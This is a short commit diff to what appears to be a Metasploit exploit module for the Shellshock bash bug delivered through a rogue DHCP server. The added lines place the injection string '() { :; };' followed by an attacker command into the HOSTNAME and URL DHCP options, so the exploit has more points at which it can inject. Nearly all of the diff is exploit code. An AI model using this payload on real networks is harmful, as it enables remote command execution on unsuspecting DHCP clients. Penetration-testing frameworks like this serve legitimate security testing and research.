Add injection to HOSTNAME and URL

jvazquez-r7 · jvazquez-r7 · commit 54e67639906e · 2014-09-26T10:13:24.000-05:00
diff --git a/modules/exploits/unix/dhcp/bash_environment.rb b/modules/exploits/unix/dhcp/bash_environment.rb
@@ -70,6 +70,9 @@ def exploit
     if hash['DOMAINNAME'].length > 255
       raise ArgumentError, 'payload too long'
     end
+
+    hash['HOSTNAME'] = "() { :; };#{echo}"
+    hash['URL'] = "() { :; };#{echo}"
     start_service(hash)
 
     begin
